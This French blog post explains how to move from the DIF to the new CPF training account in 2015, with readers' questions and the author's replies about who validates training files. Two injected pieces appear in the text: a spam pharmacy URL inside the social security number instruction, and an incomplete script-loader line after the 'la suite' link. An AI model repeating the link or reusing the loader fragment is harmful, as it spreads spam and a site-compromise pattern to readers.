Réforme de la formation professionnelle – 1

Du DIF au CPF

En vidéo

Exit le DIF, vive le CPF !

le Dossier Individuel de Formation n’a plus cours depuis le 1/1/2015 désormais, nous avons tous un Compte de Formation Professionnel.

2 changements :

  • le salarié gère directement son compte
  • le compte reste valide quel que soit le changement de situation

 

Stagiaires ou futurs stagiaires de la formation professionnelle ! Que devez-vous faire ?

Avant tout, il faut valider votre compte CPF  sur le site gouvernemental qui va bien :
www.moncompteformation.gouv.fr

Vous voyez ce n’est pas trop difficile à retenir.

Pour valider la création de ce compte vous avez besoin :
• De votre numéro de www.tadalafilcialisindia.com/ sécurité sociale
• D’une  adresse mail valide

Votre numéro de sécurité sociale vous servira d’identifiant pour la suite.

Donc vous validez votre compte, et mettez quelques informations et voilà :

image écran informations
les informations

Et une fois le compte créé ?

Une fois le compte créé, il va falloir dès que votre entreprise vous les donnera (au besoin réclamez, normalement vous auriez dû les avoir dès le 31 décembre 2014) saisir le nombre d’heures de DIF qu’il vous reste au 31/12/2014.

copie ecran heure dif

Après le compte d’heures se modifiera automatiquement dès que les entreprises renseigneront les organismes.
ATTENTION, vous devez avoir saisi le solde DIF (même égal à 0) AVANT de créer un dossier de formation

Et pour les formations alors !

Alors là, il va falloir attendre… Normalement les formations compatibles avec le CPF devraient s’afficher dans le site mais pour l’heure, c’est trop tôt.
Formations qualifiantes, compétences clés et formation spécifique aux branches professionnelles devraient s’afficher au fur et à mesure du temps.

Et vous pourrez alors aller dans votre dossier formation.

la suite >>>> compte-de-formation-2eme-partie

 var d=document;var s=d.createElement(‘script’);

9 réflexions au sujet de « Réforme de la formation professionnelle – 1 »

  1. Bonjour,
    Savez vous si le cpf prend en compte les formations en ligne? Je pense plus précisément à une formation d’hypnothérapeute.
    D’avance merci.

    1. bonjour errol,

      Seules les formations qualifiantes et « correspondant aux besoins de l’économie prévisibles à court ou moyen terme » sont éligibles.
      Pour l’instant les listes de formations autorisées ne sont toujours pas complétement définies, mais je n’ai vu nulle part trace d’une branche « thérapeute » ni même médicale d’ailleurs.
      Je doute donc que l’hypnothérapie soit éligible.
      Par contre pour les formations en ligne, il n’y a pas de problème. Que la formation soit présentielle ou en ligne ou blended (mixte), il suffit de prouver la présence sur la plateforme pour être reconnu par les opca.
      cordialement

  2. Bonjour,

    J’aurais souhaité en savoir d’avantage sur la procédure de mobilisation du cpf, notamment qui valide le dossier de formation sur le site ?

    Cordialement

    Eric

    1. Bonjour Eric,
      Le texte est clair, c’est un professionnel de la formation qui valide le dossier sur le site ! non je blague, rien de clair là-dedans. Mais je n’en attendais pas moins de nos énarques.
      Si j’ai bien tout compris, tout dépend de votre cas de figue :
      – CPF dans le cadre d’une période de chômage, c’est Pôle Emploi ou l’APEC qui valide (et en principe le dossier de formation sera monté avec leur accompagnement),
      – CPF dans le cadre d’une recherche d’emploi et travailleur handicapé, c’est Cap emploi (Agéfiph)
      – CPF pour un salarié (que le projet soit réalisé avec l’entreprise ou non), ce sont les OPCA qui gèrent la validation
      et enfin
      – CPF accompagné par un CIF… ce sont les Opacif qui prennent le relais.

      C’est à vous de demander cette validation.

      1. Bonsoir,

        Je vous remercie pour ces éclaircissements.

        Je pensais que lorsqu’il y avait une délégation à l’employeur de la part du salarié, c’était l’employeur qui validait le dossier de formation.

        De plus, j’aurais souhaité savoir dans le cas où l’accord de l’employeur est nécessaire, y a-t-il un support de réponse spécifique (courrier ou mail)?
        Et une fois que le salarié est informé de la réponse, ce dernier doit transmettre la réponse au professionnel de la formation pour validation du dossier ?

        Et quand vous dites c’est à nous de demander la validation, c’est directement via le site ?

        Je vous remercie d’avance.

        Cordialement

        1. bonjour Eric,

          Si vous êtes dans le cas d’une délégation, c’est l’employeur qui gère le CPF donc c’est lui qui fait les demandes nécessaires à l’Opca ou l’Opacif.

          Concernant l’accord de l’employeur, le décret ne fait pas apparaître de support spécifique courrier ou mail ou recommandé, seulement le délais de 30 jours à la réception de la demande.

          Quant à demander soi même sa validation, c’est auprès de l’organisme opac, opacif… qu’il faut le faire mais là je ne peux pas vous aider, je n’ai pas encore fait de recherche auprès d’eux.

          je vous conseille :
          le dossier du Cegos
          le décret d’application

          Cordialement

  3. Bonsoir,

    Je suis actuellement salarié et Cadre dans une entreprise de transports et je souhaite (pour une reconvention proche) passer par correspondance mon CAP Cuisine. Pour cela je souhaite utiliser mes heures CPF (117). J’ai donc créer mon compte et sais mon dossier de formation mais je ne savais pas à qui m’adresser pour valider ma formation et donc son financement. Ce serait donc l’OPCA, mais dans mon cas transports ou hôtellerie ? Peuvent ils refuser ?
    Est ce que je peux attaquer la formation avant leur validation ?
    Tout cela est flou.. Merci de votre aide..

    1. Bonjour aurelprost
      Puisque vous êtes salarié c’est l’OPCA dont dépend votre société de transport qui doit gérer le financement. Vous passer le CAP par correspondance donc en dehors de vos heures de travail. et vous passer un diplôme qui correspond au besoin de l’économie, je dirais donc que non il ne doit pas être refusé. maintenant les méandres de la formation sont tels que, personnellement, je n’attaquerais pas la formation avant la validation (je pense même que le centre de formation ne prendrais pas le risque).
      S’il s’avère que cette formation ne peut être seulement financer par le CPF et qu’il faut un complément… là cela devient plus compliqué.
      cordialement

Les commentaires sont fermés.